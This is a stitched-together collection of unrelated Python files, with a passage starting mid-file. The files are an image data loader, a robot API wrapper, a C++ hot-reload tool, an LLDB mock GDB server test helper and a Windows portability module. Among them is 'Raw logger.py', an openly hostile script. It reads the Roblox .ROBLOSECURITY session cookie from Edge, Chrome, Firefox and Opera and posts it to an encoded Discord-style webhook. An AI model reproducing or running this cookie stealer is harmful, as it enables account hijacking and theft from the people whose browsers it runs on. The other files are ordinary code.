absolute_path=self.absolute_path)
for image_path in images)
if self.apply_occlusion:
batch_noisy = parallel(
delayed(self._makeBatchElement)(image_path, self.multi_view, self.use_triplets,
apply_occlusion=self.apply_occlusion,
occlusion_percentage=self.occlusion_percentage,
absolute_path=self.absolute_path)
for image_path in images)
batch = th.cat(batch, dim=0)
if self.apply_occlusion:
batch_noisy = th.cat(batch_noisy, dim=0)
if self.shuffle:
batch_obs, batch_next_obs = batch[:len(images) // 2], batch[len(images) // 2:]
if batch_noisy is not None:
batch_obs_noisy, batch_next_obs_noisy = batch_noisy[:len(images) // 2], \
batch_noisy[len(images) // 2:]
self.queue.put((minibatch_idx, batch_obs, batch_next_obs,
batch_obs_noisy, batch_next_obs_noisy))
else:
self.queue.put(batch)
# Free memory
if self.shuffle:
del batch_obs
del batch_next_obs
if batch_noisy is not None:
del batch_obs_noisy
del batch_next_obs_noisy
del batch
del batch_noisy
self.queue.put(None)
@classmethod
def _makeBatchElement(cls, image_path, multi_view=False, use_triplets=False, apply_occlusion=False,
occlusion_percentage=None, absolute_path=False):
"""
:param image_path: (str) path to an image (without the 'data/' prefix)
:param multi_view: (bool)
:param use_triplets: (bool)
:return: (th.Tensor)
"""
# Remove trailing .jpg if present
prepath = '' if absolute_path else 'data/'
image_path = prepath + image_path.split('.jpg')[0]
if multi_view:
images = []
# Load different view of the same timestep
for i in range(2):
im = cv2.imread("{}_{}.jpg".format(image_path, i + 1))
if im is None:
raise ValueError("tried to load {}_{}.jpg, but it was not found".format(image_path, i + 1))
images.append(preprocessImage(im, apply_occlusion=apply_occlusion,
occlusion_percentage=occlusion_percentage))
####################
# loading a negative observation
if use_triplets:
# End of file format for positive & negative observations (camera 1) - length : 6 characters
extra_chars = '_1.jpg'
# getting path for all files of same record episode, e.g path_to_data/record_001/frame[0-9]{6}*
digits_path = glob.glob(image_path[:-6] + '[0-9]*' + extra_chars)
# getting the current & all frames' timesteps
current = int(image_path[-6:])
# For all others extract last 6 digits (timestep) after removing the extra chars
all_frame_steps = [int(k[:-len(extra_chars)][-6:]) for k in digits_path]
# removing current positive timestep from the list
all_frame_steps.remove(current)
# negative timestep by random sampling
length_set_steps = len(all_frame_steps)
negative = all_frame_steps[random.randint(0, length_set_steps - 1)]
negative_path = '{}{:06d}'.format(image_path[:-6], negative)
im3 = cv2.imread(negative_path + "_1.jpg")
if im3 is None:
raise ValueError("tried to load {}_{}.jpg, but it was not found".format(negative_path, 1))
im3 = preprocessImage(im3)
# stacking along channels
images.append(im3)
im = np.dstack(images)
else:
im = cv2.imread("{}.jpg".format(image_path))
if im is None:
raise ValueError("tried to load {}.jpg, but it was not found".format(image_path))
im = preprocessImage(im, apply_occlusion=apply_occlusion, occlusion_percentage=occlusion_percentage)
# Channel first (for pytorch convolutions) + one dim for the batch
# th.tensor creates a copy
im = th.tensor(im.reshape((1,) + im.shape).transpose(0, 3, 2, 1))
return im
def __len__(self):
return self.n_minibatches
def __iter__(self):
return self
def __next__(self):
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
next = __next__ # Python 2 compatibility
def __del__(self):
if self.process is not None:
self.process.terminate()
class SupervisedDataLoader(DataLoader):
"""
Data loader for supervised learning.
:param x_indices: (np.array) indices of observations
:param y_values: (np.array) targets for each input value
:param images_path: (np.array) Array of path to images
:param batch_size: (int)
:param n_workers: (int) number of workers used for preprocessing
    :param no_targets: (bool) Set to True, only inputs are generated
    :param shuffle: (bool) Set to True, the dataloader will shuffle the indices
    :param infinite_loop: (bool) whether to have an iterator that can be reset; set to False, the iterator stops after a single pass over the data
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
"""
def __init__(self, x_indices, y_values, images_path, batch_size, n_workers=1, no_targets=False,
shuffle=False, infinite_loop=True, max_queue_len=4, absolute_path=False):
# Create minibatch list
minibatchlist, targets = self.createMinibatchList(x_indices, y_values, batch_size)
# Whether to yield targets together with output
# (not needed when plotting or predicting states)
self.no_targets = no_targets
self.targets = np.array(targets)
self.shuffle = shuffle
self.absolute_path = absolute_path
super(SupervisedDataLoader, self).__init__(minibatchlist, images_path, n_workers=n_workers,
infinite_loop=infinite_loop, max_queue_len=max_queue_len,
absolute_path=self.absolute_path)
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._makeBatchElement(image_path,
absolute_path=self.absolute_path) for image_path in images]
else:
batch = parallel(delayed(self._makeBatchElement)(image_path) for image_path in images)
batch = th.cat(batch, dim=0)
if self.no_targets:
self.queue.put(batch)
else:
# th.tensor creates a copy
self.queue.put((batch, th.tensor(self.targets[minibatch_idx])))
# Free memory
del batch
self.queue.put(None)
@staticmethod
def createMinibatchList(x_indices, y_values, batch_size):
"""
Create list of minibatches (contains the observations indices)
along with the corresponding list of targets
Warning: this may create minibatches of different lengths
:param x_indices: (np.array)
:param y_values: (np.array)
:param batch_size: (int)
:return: ([np.array], [np.array])
"""
targets = []
minibatchlist = []
n_minibatches = len(x_indices) // batch_size + 1
for i in range(0, n_minibatches):
start_idx = i * batch_size
end_idx = min(start_idx + batch_size, len(x_indices))
excerpt = slice(start_idx, end_idx)
# Remove excerpt with no elements
if len(x_indices[excerpt]) > 0:
minibatchlist.append(x_indices[excerpt])
targets.append(y_values[excerpt])
return minibatchlist, targets
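# Minimal usage sketch (illustrative only; the image paths are made up and are
# expected to live under the 'data/' prefix, as _makeBatchElement assumes).
# With is_training=False the loader yields one th.Tensor per minibatch and,
# with infinite_loop=False, stops after a single pass over the data.
def _demo_data_loader(images_path):
    minibatchlist = DataLoader.createTestMinibatchList(len(images_path), batch_size=32)
    loader = DataLoader(minibatchlist, images_path, n_workers=2,
                        infinite_loop=False, is_training=False)
    for tensor_batch in loader:
        print(tensor_batch.shape)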
|
robot.py
|
from .utils import camel_case_to_snake_case, format_type_to_python
import json
from threading import Event, Thread
import os
from .communication_managers import generate_communication_manager
class Robot:
''' Generate a robot object with an api for each of the robot's parts. '''
def __init__(self, configuration):
# keep a copy of the configuration for later use.
ready_event = Event()
self.__communication_manager = generate_communication_manager(
configuration["communication"], ready_event)
self.thread = Thread(target=self.__communication_manager.start)
self.thread.start()
ready_event.wait()
self.__configuration = self.__communication_manager.get_configuration()
# if it is required to wait for a green light from the server in order to run the code, wait.
if "wait_for_game_start" in self.__configuration and self.__configuration["wait_for_game_start"]:
self.__communication_manager.wait_for_game_start_message()
robot_name = self.__configuration["Name"]
        # for each robot part specified in the configuration, generate an api for it, accessible via its chosen name.
for part_conf in self.__configuration["Subroutes"]:
part_name = part_conf['Name']
methods = part_conf['Methods']
setattr(self, part_name, Part(
self.__communication_manager.send_request, part_name, methods, robot_name))
def get_thread(self):
return self.thread
def get_comm_mngr(self):
return self.__communication_manager
def print_manual(self):
''' Print all the relevant information regarding the robot. '''
print("Robot name: {0}\n".format(self.__configuration["Name"]))
print("API options:")
for robot_part in self.__configuration["Subroutes"]:
''' General info about the robot part. '''
print(F'\nPart Name: {robot_part["Name"]}')
print("\tUsage:")
''' for each of the part methods, print how to use it including all arguments and their types. '''
for method in robot_part['Methods']:
method_name = method['Name']
method_spec = method['Parameters']
method_arguments = ', '.join("{0} <{1}>".format(
argument['Name'], format_type_to_python(argument['Type'])) for argument in method_spec)
print("\t\trobot.{0}.{1}({2})".format(
robot_part['Name'],
camel_case_to_snake_case(method_name),
method_arguments)
)
class Part:
def __init__(self, __send_request_func, part_name, part_methods, robot_name):
''' A function to send requests to the robot. '''
self.__send_request_func = __send_request_func
# generate a function for each of the robot-part available api calls.
for method in part_methods:
method_name = method['Name']
method_spec = method['Parameters']
return_type = format_type_to_python(method['ReturnType'])
method_to_mount = self.__generate_method_to_mount(
part_name, method_name, method_spec, return_type, robot_name)
setattr(self, camel_case_to_snake_case(
method_name), method_to_mount)
# a function to build a specific api method for a robot-part.
def __generate_method_to_mount(self, part_name, method_name, method_spec, return_type, robot_name):
# the method.
def method_to_mount(*args):
# make sure the amount of arguments given are correct.
# TODO: type-check the arguments as well.
assert len(args) == len(method_spec)
# which data to send with the api request.
request_object = {
"api": part_name,
"methodName": method_name,
"parameters": args,
"playerName": robot_name
}
res = self.__send_request_func(
request_object, return_type)
return res
return method_to_mount
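# Minimal usage sketch (illustrative only; the configuration contents and the
# part/method names below are assumptions, not a documented schema):
#
#   config = {"communication": {...}}      # whatever generate_communication_manager expects
#   robot = Robot(config)
#   robot.print_manual()                   # list every generated part and method
#   robot.arm.move_to(10, 20)              # hypothetical part/method taken from the configuration
#   robot.get_thread().join()              # wait for the communication thread to finish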
|
object_generator.py
|
#!/usr/bin/env python
from argparse import ArgumentParser
from os import path, listdir, stat
from os.path import isfile, join
from time import sleep
import subprocess
import threading
class Shell():
def __init__(self, objFolder, name, link):
self.__objFolder = objFolder
self.__name = name
self.__link = link
def run(self):
while True:
i = input("> ")
if i == "exit":
break
if i == "comp":
try:
subprocess.run(self.__genCommand())
except Exception:
pass
def __genCommand(self) -> [str]:
files = [self.__objFolder + "/" + f for f in listdir(self.__objFolder) if isfile(join(self.__objFolder, f)) and f.endswith(".cpp.o")]
s = "g++ -o " + self.__name + " " + " ".join(files) + " -l"
s += " -l".join(self.__link)
print(s)
return s.split(" ")
class ConfReader():
def __init__(self, file):
self.__file = file
self.__name = None
self.__link = None
self.__include = None
self.__options = None
self.__parse()
def __parse(self):
with open(self.__file) as fd:
lines = fd.readlines()
for l in lines:
t = l.strip().split(":")
if t[0] == "name":
self.__name = t[1]
elif t[0] == "link":
self.__link = t[1].split(",")
elif t[0] == "include":
self.__include = t[1].split(",")
elif t[0] == "options":
self.__options = t[1].split(",")
# print(self.__link)
# print(self.__include)
# print(self.__options)
def __bool__(self) -> bool:
return self.__link != None and self.__include != None and self.__options != None and self.__name != None
def getInfos(self) -> (str, str, str, str):
return self.__name, self.__link, self.__include, self.__options
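# Example configuration file accepted by ConfReader (illustrative, derived from
# __parse above): one "key:value" line per setting, with comma-separated lists.
#
#   name:my_app
#   link:SDL2,pthread
#   include:./include,./third_party
#   options:-Wall,-O2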
class Compile():
def __init__(self, srcFolder, objFolder, link, include, options):
self.__srcFolder = srcFolder
self.__objFolder = objFolder
self.__link = link
self.__include = include
self.__options = options
self.__sources = self.__getSources()
#print(self.__sources)
def __getSources(self):
files = [f for f in listdir(self.__srcFolder) if isfile(join(self.__srcFolder, f)) and f.endswith(".cpp")]
dates = [int(stat(join(self.__srcFolder, f)).st_mtime) for f in files]
return dict(zip(files, dates))
def reload(self, e: threading.Event):
while not e.isSet():
for old, new in zip(self.__sources.items(), self.__getSources().items()):
name, oldStamp = old
_, newStamp = new
if newStamp > oldStamp:
subprocess.run(self.__createCommand(name))
self.__sources[name] = newStamp
sleep(1)
def __createCommand(self, name):
s = f"g++ -c {join(self.__srcFolder, name)}"
s += " -o " + join(self.__objFolder, name + ".o ")
s += " ".join(self.__options) + " -I"
s += " -I".join(self.__include) + " -l"
s += " -l".join(self.__link)
#print(s.split(" "))
return s.split(" ")
def main():
parse = ArgumentParser("Hot reloading for C++ files")
parse.add_argument("src", help="folder where sources are")
    parse.add_argument("obj", help="folder where object files will be placed")
parse.add_argument("config", help="configuration file")
args = parse.parse_args()
srcFolder = path.abspath(args.src)
objFolder = path.abspath(args.obj)
c = ConfReader(args.config)
if c:
name, link, include, options = c.getInfos()
comp = Compile(srcFolder, objFolder, link, include, options)
e = threading.Event()
t = threading.Thread(target=comp.reload, args=(e,))
t.start()
s = Shell(objFolder, name, link)
s.run()
e.set()
t.join()
else:
        print("Error: invalid configuration file")
exit(84)
if __name__ == "__main__":
main()
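# Example invocation (illustrative): watch ./src for modified .cpp files, write
# object files to ./obj, and read the settings from a config file like the one
# sketched above:
#
#   python object_generator.py ./src ./obj ./project.conf
#
# Type "comp" in the interactive shell to link the objects, "exit" to quit.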
|
gdbclientutils.py
|
import os
import os.path
import subprocess
import threading
import socket
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
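# Illustrative example (not part of the original test support code): framing
# the reply "OK" yields "$OK#9a", because ord('O') + ord('K') == 154 == 0x9a.
def _demo_frame_packet():
    assert checksum("OK") == 0x9a
    assert frame_packet("OK") == "$OK#9a"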
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
    Most bytes are sent through as-is, but $, #, and } are escaped by writing
    a } followed by the original byte XOR'd with 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
    out = ""
    i = 0
    hex_len = len(hex_bytes)
    while i < hex_len - 1:
        out += chr(int(hex_bytes[i:i + 2], 16))
        i += 2
    return out
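# Illustrative example (not part of the original test support code): the two
# hex helpers are inverses of each other, e.g. "OK" <-> "4f4b".
def _demo_hex_round_trip():
    assert hex_encode_bytes("OK") == "4f4b"
    assert hex_decode_bytes("4f4b") == "OK"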
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet == "g":
return self.readRegisters()
if packet[0] == "G":
return self.writeRegisters(packet[1:])
if packet[0] == "p":
return self.readRegister(int(packet[1:], 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
            return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet[0] == "H":
return self.selectThread(packet[1], int(packet[2:], 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
return self.other(packet)
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def other(self, packet):
# empty string means unsupported
return ""
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
port = 0
_socket = None
_client = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, port = 0):
self.responder = MockGDBServerResponder()
self.port = port
self._socket = socket.socket()
def start(self):
# Block until the socket is up, so self.port is available immediately.
# Then start a thread that waits for a client connection.
addr = ("127.0.0.1", self.port)
self._socket.bind(addr)
self.port = self._socket.getsockname()[1]
self._socket.listen(0)
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
self._socket.close()
self._thread.join()
self._thread = None
def _run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._socket.settimeout(2.0)
client, client_addr = self._socket.accept()
self._client = client
# The connected client inherits its timeout from self._socket,
# but we'll use a blocking socket for the client
self._client.settimeout(None)
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
while True:
try:
data = self._client.recv(4096)
if data is None or len(data) == 0:
break
# In Python 2, sockets return byte strings. In Python 3, sockets return bytes.
# If we got bytes (and not a byte string), decode them to a string for later handling.
if isinstance(data, bytes) and not isinstance(data, str):
data = data.decode()
self._receive(data)
except Exception as e:
self._client.close()
break
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
try:
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
except self.InvalidPacketException:
self._client.close()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
        its data is removed from self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._client.sendall('+'.encode())
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
# Handle packet framing since we don't want to bother tests with it.
if response is not None:
framed = frame_packet(response)
# In Python 2, sockets send byte strings. In Python 3, sockets send bytes.
# If we got a string (and not a byte string), encode it before sending.
if isinstance(framed, str) and not isinstance(framed, bytes):
framed = framed.encode()
self._client.sendall(framed)
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class InvalidPacketException(Exception):
pass
class GDBRemoteTestBase(TestBase):
"""
Base class for GDB client tests.
This class will setup and start a mock GDB server for the test to use.
It also provides assertPacketLogContains, which simplifies the checking
of packets sent by the client.
"""
NO_DEBUG_INFO_TESTCASE = True
mydir = TestBase.compute_mydir(__file__)
server = None
def setUp(self):
TestBase.setUp(self)
self.server = MockGDBServer()
self.server.start()
def tearDown(self):
# TestBase.tearDown will kill the process, but we need to kill it early
# so its client connection closes and we can stop the server before
# finally calling the base tearDown.
if self.process() is not None:
self.process().Kill()
self.server.stop()
TestBase.tearDown(self)
def createTarget(self, yaml_path):
"""
Create a target by auto-generating the object based on the given yaml
instructions.
This will track the generated object so it can be automatically removed
during tearDown.
"""
yaml_base, ext = os.path.splitext(yaml_path)
obj_path = self.getBuildArtifact(yaml_base)
self.yaml2obj(yaml_path, obj_path)
return self.dbg.CreateTarget(obj_path)
def connect(self, target):
"""
Create a process by connecting to the mock GDB server.
Includes assertions that the process was successfully created.
"""
listener = self.dbg.GetListener()
error = lldb.SBError()
url = "connect://localhost:%d" % self.server.port
process = target.ConnectRemote(listener, url, "gdb-remote", error)
self.assertTrue(error.Success(), error.description)
self.assertTrue(process, PROCESS_IS_VALID)
return process
def assertPacketLogContains(self, packets):
"""
Assert that the mock server's packet log contains the given packets.
The packet log includes all packets sent by the client and received
        by the server. This function makes it easy to verify that the client
sent the expected packets to the server.
The check does not require that the packets be consecutive, but does
        require that they appear in the log in the same order as in the argument.
"""
i = 0
j = 0
log = self.server.responder.packetLog
while i < len(packets) and j < len(log):
if log[j] == packets[i]:
i += 1
j += 1
if i < len(packets):
self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
(packets[i], u'\n\t'.join(log[-10:])))
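# Minimal usage sketch (illustrative only; the responder override, the empty
# target and the asserted packet are examples, not a fixed recipe):
#
#   class MyResponder(MockGDBServerResponder):
#       def qSymbol(self, symbol_args):
#           return "OK"
#
#   class TestExample(GDBRemoteTestBase):
#       def test_example(self):
#           self.server.responder = MyResponder()
#           target = self.dbg.CreateTarget("")
#           process = self.connect(target)
#           self.assertPacketLogContains(["QStartNoAckMode"])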
|
Raw logger.py
|
import browser_cookie3, requests, threading
import base64
import time
import os
key = "ENCODED BASE32 HOOK HEREEEE"
weblook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
|
portable.py
|
import git_config
import os
import pager
import platform
import re
import shutil
import socket
import stat
import sys
import subprocess
import threading
from trace import Trace
def isUnix():
return platform.system() != "Windows"
if isUnix():
import fcntl
def to_windows_path(path):
return path.replace('/', '\\')
def rmtree(top):
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
filename = os.path.join(root, name)
os.chmod(filename, stat.S_IWRITE)
os.remove(filename)
for name in dirs:
rmtree(os.path.join(root, name))
os.rmdir(top)
def rename(src, dst):
if isUnix():
os.rename(src, dst)
else:
if os.path.exists(dst):
os.remove(dst)
os.rename(src, dst)
def onerror(function, path, excinfo):
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWUSR)
function(path)
else:
raise
def input_reader(src, dest, std_name):
if isUnix():
return file_reader(src, dest, std_name)
else:
return socket_reader(src, dest, std_name)
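# Usage sketch (illustrative only; 'cmd' and the destination buffers are made
# up, and the caller is assumed to import select): both reader classes expose
# fileno()/read(), so platform-specific pipe handling stays behind one interface.
#
#   p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#   readers = [input_reader(p.stdout, out_buf, 'stdout'),
#              input_reader(p.stderr, err_buf, 'stderr')]
#   ready, _, _ = select.select(readers, [], [])
#   for r in ready:
#       chunk = r.read(4096)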
class file_reader(object):
"""select file descriptor class"""
def __init__(self, fd, dest, std_name):
assert std_name in ('stdout', 'stderr')
self.fd = fd
self.dest = dest
self.std_name = std_name
self.setup_fd()
def setup_fd(self):
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self, bufsize):
return self.fd.read(bufsize)
def close(self):
return self.fd.close()
def src(self):
return self.fd
class socket_reader():
"""select socket with file descriptor class"""
def __init__(self, src, dest, std_name=''):
self.src = src
self.dest = dest
self.std_name = std_name
self.completed = False
self.host = "localhost"
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.server_socket.bind((self.host, 0))
self.server_socket.setblocking(0)
self.port = self.server_socket.getsockname()[1]
address = (self.host, self.port)
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.client_socket.connect(address)
t = threading.Thread(target=self.send_msg, args=(self.src, self.client_socket, address))
t.start()
def send_msg(self, src, dest, address):
while True:
data = src.read(4096)
if data:
dest.sendto(data, address)
else:
break
dest.sendto("", address)
def read(self, bufsize):
try:
return self.server_socket.recv(bufsize)
except Exception as e:
Trace("failed to read from server socket: " + e.strerror)
self.close()
def close(self):
if self.client_socket:
self.client_socket.close()
if self.server_socket:
self.server_socket.close()
def fileno(self):
return self.server_socket.fileno()
def src(self):
return self.src
def os_symlink(src, dst):
if isUnix():
os.symlink(src, dst)
else:
windows_symlink(src, dst)
def windows_symlink(src, dst):
globalConfig = git_config.GitConfig.ForUser()
src = to_windows_path(src)
dst = to_windows_path(dst)
is_dir = True if os.path.isdir(os.path.realpath(os.path.join(os.path.dirname(dst), src))) else False
no_symlinks = globalConfig.GetBoolean("portable.windowsNoSymlinks")
if no_symlinks is None or no_symlinks == False:
symlink_options_dir = '/D'
symlink_options_file = ''
else:
src = os.path.abspath(os.path.join(os.path.dirname(dst), src))
Trace("Using no symlinks for %s from %s to %s", "dir" if is_dir else "file", src, dst)
symlink_options_dir = '/J'
symlink_options_file = '/H'
if is_dir:
cmd = ['cmd', '/c', 'mklink', symlink_options_dir, dst, src]
cmd = filter(len, cmd)
Trace(' '.join(cmd))
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
except Exception as e:
Trace("failed to create dir symlink: %s", e.strerror)
pass
else:
cmd = ['cmd', '/c', 'mklink', symlink_options_file, dst, src]
cmd = filter(len, cmd)
Trace(' '.join(cmd))
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
except Exception as e:
Trace("failed to create file symlink: %s", e.strerror)
pass
def os_path_islink(path):
if isUnix():
        return os.path.islink(path)
else:
if get_windows_symlink(path) is not None:
return True
if get_windows_hardlink(path) is not None:
return True
return False
def os_path_realpath(file_path):
if isUnix():
        return os.path.realpath(file_path)
else:
if not os.path.exists(file_path):
return file_path
return windows_realpath(file_path)
def windows_realpath(file_path):
symlink = file_path
while True:
s = get_windows_symlink(symlink)
if s is None:
break
else:
symlink = s
hardlink = get_windows_hardlink(symlink)
if hardlink is not None:
return hardlink
else:
return symlink
def get_windows_symlink(file_path):
if os.path.isdir(file_path):
root = os.path.abspath(os.path.join(file_path, os.pardir))
file_object = os.path.split(file_path)[1]
if not file_object:
file_object = os.path.split(os.path.split(file_object)[0])[1]
else:
root = os.path.dirname(file_path)
file_object = os.path.split(file_path)[1]
cmd = ['cmd', '/c', 'dir', '/AL', root]
try:
Trace(' '.join(cmd))
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except:
return None
lines = [s.strip() for s in out.split('\n')]
if len(lines) < 6:
return None
pattern = re.compile('.*<(.*)>\\s*(.*) \[(.*)\]$')
for line in lines[5:]:
result = pattern.match(line)
if result:
ftype = result.group(1)
fname = result.group(2)
flink = result.group(3)
if file_object == fname:
if ftype == 'SYMLINK' or ftype == 'SYMLINKD':
new_path = os.path.realpath(os.path.join(os.path.dirname(file_path), flink))
Trace("Relative link found: %s -> %s -> %s", fname, flink, new_path)
else:
new_path = flink
Trace("Absolute link found: %s -> %s", fname, flink)
return new_path
return None
